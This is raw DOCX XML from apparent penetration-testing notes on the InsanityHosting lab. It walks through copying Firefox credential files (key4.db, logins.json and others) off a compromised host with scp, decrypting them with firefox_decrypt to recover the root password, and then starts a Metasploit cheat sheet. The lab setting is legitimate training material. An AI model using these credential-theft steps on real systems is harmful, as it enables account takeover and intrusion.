    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000495">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2162051" cy="2800034"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="433" name="image428.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image428.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId89"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2162051" cy="2800034"/>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rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4907380" cy="1195388"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64" name="image72.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image72.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId90"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4907380"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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o746dlmg9p9n" w:id="35"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Firefox and .mozilla (and firefox_decrypt)</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In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId91">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">InsanityHosting</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play (on Vulnhub, it was called "Insanity: 1"), we saw a .mozilla file in the home directory of a compromised user. </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If Firefox was used on this system and any entered user credentials were saved in the browser, it is possible to recover them. We can query these four files to see if that is the case (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cert9.db, cookies.sqlite, key4.db, logins.json</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">):</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls .mozilla/firefox/esmhp32w.default-default | grep -E "logins.json|cert9.db|cookies.sqlite|key4.db"</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="622300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="184" name="image174.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image174.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId92"/>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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Indeed, it looks like the four files of interest are present, signifying that we might be able to recover some passwords. On our attacking machine, we can clone the repository of the tool that will help us in this attack - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">firefox_decrypt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004A7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="600" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone</w:t>
      </w:r>
      <w:hyperlink r:id="rId93">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="ff0000"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId94">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="ff0000"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/unode/firefox_decrypt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004A8">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, let's copy the four files to our attacking machine for decrypting:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004A9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="600" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scp -o StrictHostKeyChecking=no -r elliot@192.168.195.124:/home/elliot/.mozilla/firefox/esmhp32w.default-default/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cert9.db </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/root/Desktop/Tools/firefox_decrypt/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004AA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="600" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scp -o StrictHostKeyChecking=no -r elliot@192.168.195.124:/home/elliot/.mozilla/firefox/esmhp32w.default-default/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cookies.sqlite</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /root/Desktop/Tools/firefox_decrypt/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004AB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="600" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scp -o StrictHostKeyChecking=no -r elliot@192.168.195.124:/home/elliot/.mozilla/firefox/esmhp32w.default-default/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">key4.db </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/root/Desktop/Tools/firefox_decrypt/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004AC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="600" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scp -o StrictHostKeyChecking=no -r elliot@192.168.195.124:/home/elliot/.mozilla/firefox/esmhp32w.default-default/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">logins.json</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /root/Desktop/Tools/firefox_decrypt/</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Move all file in single folder:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004AF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mv cert9.db cookies.sqlite key4.db logins.json ./fir</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Once the files have been transferred, we can run the tool as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004B2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 firefox_decrypt.py fir/</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1244600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="326" name="image324.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image324.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId95"/>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It looks like we have recovered the root user password. We can confirm this by logging in as root in our SSH shell!</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C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_estzwrn7ndbm" w:id="36"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit</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hyperlink r:id="rId96">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Cheatsheet </w:t>
        </w:r>
      </w:hyperlink>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download Metasploit packages, including msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install metasploit-framework</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b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tip:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1174"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For RHOSTS, since it asks for HOSTS, then you don't need to include the http://</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1174"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it asks for TARGETURI (without the RHOSTS) or something like that, then include http://</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1174"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But if it asks for both RHOSTS and TARGETURI, then you might just put a "/" for TARGETURI if the target is just the website without any path</w:t>
      </w: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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xrsarjvcr77" w:id="37"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basics</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How to initialize metasploit (run these on fresh machines that haven't run metasploit yet):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="732"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo msfdb init</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="732"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo systemctl enable postgresql</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How to start metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "-q" flag means quiet, so it won't output the banners when you start it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">db_status</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check to see if have database connectivity </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output should be: "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Connected to msf. Connection type: postgresql.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4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use [PATH_TO_MODULE]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="615"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to use a module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1412"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Show compatible payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004DA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004DB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show -h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Show categories of stuff inside of msf</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dr1y9tjoi25d" w:id="38"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Work Spaces</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
